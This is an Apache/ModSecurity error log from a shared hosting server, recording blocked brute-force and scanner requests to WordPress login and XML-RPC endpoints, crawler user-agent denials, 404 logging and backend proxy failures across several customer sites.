[Tue May 26 15:58:58.874637 2026] [security2:error] [pid 762634:tid 762886] [client 223.123.125.8:64789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV16rx8rj1VZMqUAOdiDgAAAHo"]
[Tue May 26 15:58:58.874747 2026] [security2:error] [pid 762634:tid 762886] [client 223.123.125.8:64789] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV16rx8rj1VZMqUAOdiDgAAAHo"]
[Tue May 26 15:58:59.230208 2026] [security2:error] [pid 762634:tid 762811] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV16rx8rj1VZMqUAOdiCgAAAC8"]
[Tue May 26 15:58:59.391797 2026] [security2:error] [pid 762634:tid 762787] [client 91.238.181.19:52194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV167x8rj1VZMqUAOdiFwAAABc"]
[Tue May 26 15:58:59.972279 2026] [security2:error] [pid 762634:tid 762838] [client 103.44.52.196:45366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV167x8rj1VZMqUAOdiKgAAAEo"]
[Tue May 26 15:58:59.972406 2026] [security2:error] [pid 762634:tid 762838] [client 103.44.52.196:45366] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV167x8rj1VZMqUAOdiKgAAAEo"]
[Tue May 26 15:59:00.082142 2026] [security2:error] [pid 762634:tid 762771] [client 23.236.132.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV17Lx8rj1VZMqUAOdiLQAAAAc"], referer: https://www.anujtradingco.com/
[Tue May 26 15:59:00.828555 2026] [security2:error] [pid 762634:tid 762891] [client 91.238.181.19:52222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV17Lx8rj1VZMqUAOdiRAAAAH8"]
[Tue May 26 15:59:01.244672 2026] [security2:error] [pid 762634:tid 762764] [client 136.144.42.193:41647] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahV167x8rj1VZMqUAOdiIgAAAAA"]
[Tue May 26 15:59:01.272451 2026] [security2:error] [pid 762634:tid 762774] [client 23.236.132.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV17bx8rj1VZMqUAOdiWwAAAAo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1471757&moderation-hash=9cfbb804ff1b9d4869a2d8346f8fb92c
[Tue May 26 15:59:01.802111 2026] [security2:error] [pid 762634:tid 762836] [client 114.119.130.210:23505] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "acacia.org.in"] [uri "/robots.txt"] [unique_id "ahV17bx8rj1VZMqUAOdicgAAAEg"]
[Tue May 26 15:59:01.831425 2026] [security2:error] [pid 762634:tid 762768] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV17bx8rj1VZMqUAOdiXwAAAAQ"]
[Tue May 26 15:59:02.539505 2026] [security2:error] [pid 762634:tid 762878] [client 91.238.181.19:52230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV17rx8rj1VZMqUAOdihgAAAHI"]
[Tue May 26 15:59:04.004823 2026] [security2:error] [pid 762634:tid 762766] [client 91.238.181.19:52244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV18Lx8rj1VZMqUAOdirAAAAAI"]
[Tue May 26 15:59:04.040334 2026] [security2:error] [pid 762634:tid 762865] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV177x8rj1VZMqUAOdipQAAAGU"]
[Tue May 26 15:59:05.415068 2026] [security2:error] [pid 762634:tid 762845] [client 103.153.130.62:50903] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV18bx8rj1VZMqUAOdi2QAAAFE"]
[Tue May 26 15:59:05.415226 2026] [security2:error] [pid 762634:tid 762845] [client 103.153.130.62:50903] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV18bx8rj1VZMqUAOdi2QAAAFE"]
[Tue May 26 15:59:05.441117 2026] [security2:error] [pid 762634:tid 762884] [client 91.238.181.19:52250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV18bx8rj1VZMqUAOdi2gAAAHg"]
[Tue May 26 15:59:05.985892 2026] [security2:error] [pid 762634:tid 762860] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV18bx8rj1VZMqUAOdi4AAAAGA"]
[Tue May 26 15:59:06.890907 2026] [security2:error] [pid 762634:tid 762855] [client 91.238.181.19:52262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV18rx8rj1VZMqUAOdi_gAAAFs"]
[Tue May 26 15:59:06.924400 2026] [security2:error] [pid 762634:tid 762833] [client 43.157.120.254:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahV18rx8rj1VZMqUAOdi9AAAAEU"]
[Tue May 26 15:59:07.429369 2026] [security2:error] [pid 762634:tid 762793] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV187x8rj1VZMqUAOdjAQAAAB0"]
[Tue May 26 15:59:07.820451 2026] [security2:error] [pid 762634:tid 762803] [client 106.219.85.83:31051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV187x8rj1VZMqUAOdjEAAAACc"]
[Tue May 26 15:59:07.820614 2026] [security2:error] [pid 762634:tid 762803] [client 106.219.85.83:31051] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV187x8rj1VZMqUAOdjEAAAACc"]
[Tue May 26 15:59:08.242403 2026] [security2:error] [pid 762634:tid 762807] [client 66.249.64.172:49730] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahV187x8rj1VZMqUAOdjAgAAACs"], referer: https://doyecpa.com/prizes/131126773%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 15:59:08.357869 2026] [security2:error] [pid 762634:tid 762837] [client 91.238.181.19:52284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV19Lx8rj1VZMqUAOdjIQAAAEk"]
[Tue May 26 15:59:09.560642 2026] [security2:error] [pid 762634:tid 762826] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV19bx8rj1VZMqUAOdjNQAAAD4"]
[Tue May 26 15:59:09.867884 2026] [security2:error] [pid 762634:tid 762785] [client 91.238.181.19:39236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV19bx8rj1VZMqUAOdjQQAAABU"]
[Tue May 26 15:59:10.383152 2026] [security2:error] [pid 762634:tid 762788] [client 216.244.66.241:59670] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/avalvularedbd/dbfbfc1119569.shtml"] [unique_id "ahV19rx8rj1VZMqUAOdjUwAAABg"]
[Tue May 26 15:59:10.383274 2026] [security2:error] [pid 762634:tid 762788] [client 216.244.66.241:59670] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/avalvularedbd/dbfbfc1119569.shtml"] [unique_id "ahV19rx8rj1VZMqUAOdjUwAAABg"]
[Tue May 26 15:59:10.538429 2026] [security2:error] [pid 762634:tid 762787] [client 103.44.52.196:34754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV19rx8rj1VZMqUAOdjVQAAABc"]
[Tue May 26 15:59:10.538569 2026] [security2:error] [pid 762634:tid 762787] [client 103.44.52.196:34754] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV19rx8rj1VZMqUAOdjVQAAABc"]
[Tue May 26 15:59:11.301857 2026] [security2:error] [pid 762634:tid 762824] [client 91.238.181.19:39260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV197x8rj1VZMqUAOdjbQAAADw"]
[Tue May 26 15:59:11.340897 2026] [security2:error] [pid 762634:tid 762836] [client 47.128.126.2:22280] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "afstpaul.org"] [uri "/robots.txt"] [unique_id "ahV197x8rj1VZMqUAOdjbgAAAEg"]
[Tue May 26 15:59:12.342482 2026] [security2:error] [pid 762634:tid 762802] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV197x8rj1VZMqUAOdjfQAAACY"]
[Tue May 26 15:59:12.783590 2026] [security2:error] [pid 762634:tid 762851] [client 91.238.181.19:39288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1-Lx8rj1VZMqUAOdjlwAAAFc"]
[Tue May 26 15:59:13.063936 2026] [security2:error] [pid 762634:tid 762852] [client 223.123.125.8:64791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1-bx8rj1VZMqUAOdjmwAAAFg"]
[Tue May 26 15:59:13.064071 2026] [security2:error] [pid 762634:tid 762852] [client 223.123.125.8:64791] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV1-bx8rj1VZMqUAOdjmwAAAFg"]
[Tue May 26 15:59:13.090455 2026] [security2:error] [pid 762634:tid 762787] [client 94.31.73.197:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1-Lx8rj1VZMqUAOdjkAAAABc"]
[Tue May 26 15:59:13.520306 2026] [security2:error] [pid 762634:tid 762775] [client 185.191.171.16:37140] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/7/"] [unique_id "ahV1-bx8rj1VZMqUAOdjpgAAAAs"]
[Tue May 26 15:59:13.520489 2026] [security2:error] [pid 762634:tid 762775] [client 185.191.171.16:37140] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/7/"] [unique_id "ahV1-bx8rj1VZMqUAOdjpgAAAAs"]
[Tue May 26 15:59:14.200505 2026] [security2:error] [pid 762634:tid 762847] [client 91.238.181.19:39302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1-rx8rj1VZMqUAOdjvAAAAFM"]
[Tue May 26 15:59:14.368265 2026] [security2:error] [pid 762634:tid 762786] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1-bx8rj1VZMqUAOdjtgAAABY"]
[Tue May 26 15:59:14.767697 2026] [security2:error] [pid 762634:tid 762865] [client 216.244.66.241:43454] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/avalvularfbea/dabbee1420609.shtml"] [unique_id "ahV1-rx8rj1VZMqUAOdjzgAAAGU"]
[Tue May 26 15:59:14.767816 2026] [security2:error] [pid 762634:tid 762865] [client 216.244.66.241:43454] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/avalvularfbea/dabbee1420609.shtml"] [unique_id "ahV1-rx8rj1VZMqUAOdjzgAAAGU"]
[Tue May 26 15:59:15.641379 2026] [security2:error] [pid 762634:tid 762869] [client 91.238.181.19:39330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1-7x8rj1VZMqUAOdj7gAAAGk"]
[Tue May 26 15:59:15.755152 2026] [autoindex:error] [pid 762634:tid 762811] [client 40.160.16.154:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:59:15.768409 2026] [security2:error] [pid 762634:tid 762883] [client 103.153.130.62:51189] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1-7x8rj1VZMqUAOdj9QAAAHc"]
[Tue May 26 15:59:15.768526 2026] [security2:error] [pid 762634:tid 762883] [client 103.153.130.62:51189] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV1-7x8rj1VZMqUAOdj9QAAAHc"]
[Tue May 26 15:59:15.912924 2026] [security2:error] [pid 762634:tid 762661] [remote 51.91.98.45:42544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV1-7x8rj1VZMqUAOdj8wAAVRo"]
[Tue May 26 15:59:16.345014 2026] [security2:error] [pid 762634:tid 762769] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1-7x8rj1VZMqUAOdj-wAAAAU"]
[Tue May 26 15:59:16.661434 2026] [security2:error] [pid 762634:tid 762814] [client 94.176.81.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV1-7x8rj1VZMqUAOdj2gAAADI"]
[Tue May 26 15:59:17.044641 2026] [security2:error] [pid 762634:tid 762784] [client 91.238.181.19:39354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1_bx8rj1VZMqUAOdkHQAAABQ"]
[Tue May 26 15:59:17.111647 2026] [autoindex:error] [pid 762634:tid 762870] [client 40.160.16.154:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:59:17.661149 2026] [proxy:error] [pid 762634:tid 762669] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:59:17.661257 2026] [proxy_http:error] [pid 762634:tid 762669] [remote 35.94.96.83:38572] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:59:17.662012 2026] [proxy:error] [pid 762634:tid 762669] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:59:17.662058 2026] [proxy_http:error] [pid 762634:tid 762669] [remote 35.94.96.83:38572] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:59:17.753905 2026] [proxy:error] [pid 762634:tid 762672] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:59:17.754004 2026] [proxy_http:error] [pid 762634:tid 762672] [remote 35.94.96.83:38572] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:59:17.754786 2026] [proxy:error] [pid 762634:tid 762672] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:59:17.754843 2026] [proxy_http:error] [pid 762634:tid 762672] [remote 35.94.96.83:38572] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:59:18.475248 2026] [security2:error] [pid 762634:tid 762838] [client 106.219.85.83:15448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1_rx8rj1VZMqUAOdkRAAAAEo"]
[Tue May 26 15:59:18.475358 2026] [security2:error] [pid 762634:tid 762838] [client 106.219.85.83:15448] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV1_rx8rj1VZMqUAOdkRAAAAEo"]
[Tue May 26 15:59:18.563339 2026] [security2:error] [pid 762634:tid 762865] [client 91.238.181.19:39376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1_rx8rj1VZMqUAOdkRgAAAGU"]
[Tue May 26 15:59:19.941056 2026] [security2:error] [pid 762634:tid 762864] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1_7x8rj1VZMqUAOdkWwAAAGQ"]
